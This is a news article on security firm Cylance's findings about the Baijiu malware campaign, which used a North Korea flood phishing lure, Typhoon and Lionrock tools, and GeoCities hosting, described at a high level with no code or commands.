Baijiu malware preys on heightened interest in North Korea

Security researchers have detected a new strain of malware dubbed Baijiu that targets people curious about what happens within North Korea. According to security firm Cylance, the new advanced threat "abuses global concern about the dire humanitarian situation in North Korea" by luring victims with a malicious file that offers insight into the devastating flood that the hit North Hamgyong province last year.

The phishing bait reads: "2016 North Korea Hamgyung province flood insight."

"The lure is a reference to a natural disaster that took place in late August 2016, when Typhoon Lionrock triggered massive flooding that wiped out much of North Korea's province of North Hamgyong, impacting more than half a million people, drawing world-wide notice, and commanding international news coverage for several months," researchers said.

Despite the media attention, details regarding the extent, casualties and aftermath of the disastrous flood are still scarce.

"Reports surfaced of attempts at escape and defection to neighbouring China, after border forces and fencing were washed away," researchers explain. "Drawing even more curiosity were statements from Pyongyang itself, which took the rare step of publicly declaring the flood the worst natural disaster since 1945.

"How the crisis was resolved, and what its lasting impact was on North Korea is anyone's guess. Exactly how many people died or were displaced? Were North Korea's official pronouncements to be believed? Baijiu's attackers bet that many of their phishing targets would click on their attachment to find out just that – in other words, they would take the bait."

The attack aims to deploy a set of espionage tools through a downloader called Typhoon and a set of backdoors dubbed Lionrock.

Cylance believes the threat's provenance is likely Chinese, shares code similarities with the Egobot codebase and is subsequently connected to the Darkhotel Operation.

"Baijiu's circuitous route from LNK file to Lionrock backdoor through multiple DLL files and PowerShell scripts – and its ability to obfuscate itself through each stage while doing so – makes this attack stand out", researchers said. "Baijiu attackers likely employed this strategy to throw researchers and investigators off their track, and ensure only the targeted victims received the payloads."

The researchers said the attack's unusual complexity, appropriation of Japanese web hosting service GeoCities and the use of multiple methods of obfuscation have helped the malware sidestep nearly every antivirus solution.

Yahoo-owned GeoCities is a free, web hosting service in Japan that can be used by anyone with a Yahoo email address. It also does not require users to provide any additional information besides their email address, making it a particularly ripe target for malicious actors.

The researchers said they observed 10 other active sites hosted on GeoCities that were used to deploy similar malicious payloads.

"Appropriating the GeoCities' free, high-bandwidth, civilian infrastructure helps Baijiu hide in plain sight, and signals a troubling new trend in attack techniques that is almost surely not restricted to Yahoo's GeoCities," they wrote.